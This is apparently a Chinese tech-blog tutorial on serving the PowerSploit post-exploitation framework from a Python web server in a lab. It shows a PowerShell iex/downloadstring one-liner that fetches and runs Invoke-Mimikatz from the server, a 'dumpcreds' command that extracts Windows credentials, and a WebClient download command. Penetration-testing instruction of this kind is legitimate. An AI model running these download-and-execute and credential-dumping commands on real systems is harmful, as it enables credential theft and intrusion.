当前位置: 移动技术网 > IT编程>脚本编程>Python > 利用python搭建Powersploit powershell脚本站点

利用python搭建Powersploit powershell脚本站点

2019年02月25日  | 移动技术网IT编程  | 我要评论

逐寇尖刀电视剧全集,李建宇,金基范去哪了

powershell脚本站点的搭建

一、powersploit

powersploit是一款基于powershell的后渗透(post-exploitation)框架,集成大量渗透相关模块和功能。

下载powersploit

github地址: https://github.com/mattifestation/powersploit

二、搭建站点(这里用python自带的web服务,也可以用phpstudy等搭建站点)

1.实验环境:

服务端:win7(python3.7)

客户端:windows server 2008

客户端有python环境(用python的web服务),确保客户端能连通服务端

2.实验步骤:

服务端:(win7)

1.把下载好的powersploit,解压

  

 

2.安装python,cd到powersploit-master目录里面,并开启web服务

  python -m http.server 80    #python3.7

  

3.本地测试python的web服务是否开启

  

客户端:(windows server2008)

客户端测试:

  

可以看到通过客户端的浏览器访问到搭建的站点了

下面开始进行powersploit内网渗透神器其中的invoke-mimikatz.ps1脚本文件进行举例

在客户端加载服务端脚本并执行(iex远程下载脚本执行)

powershell加载iex(new-object net.webclient).downloadstring('http://192.168.10.4/exfiltration/invoke-mimikatz.ps1”)

 执行: invoke-mimikatz -dumpcreds

       效果图如下:

  

  从上图可以看到已经获取到本机(windows server2008 的用户名和密码) 

tips:还有一种可以直接把脚本文件下载下来的方式

$client=new-object system.net.webclient

$client.downloadfile(‘http://192.168.8.135/exfiltration/invoke-mimikatz.ps1’,’c://mimikatz.ps1’)

也可以直接运行脚本文件来进行内网攻击,但这种方式并不推荐,因为系统出于安全考虑

powershell默认是不能执行本机上的.ps1文件的,这是因为ps有默认的安全限制

 

 

  

 

您可能感兴趣的文章:

如对本文有疑问,请在下面进行留言讨论,广大热心网友会与你互动!! 点击进行留言回复

相关文章:

验证码:
最近更新的文章
大家感兴趣的文章
移动技术网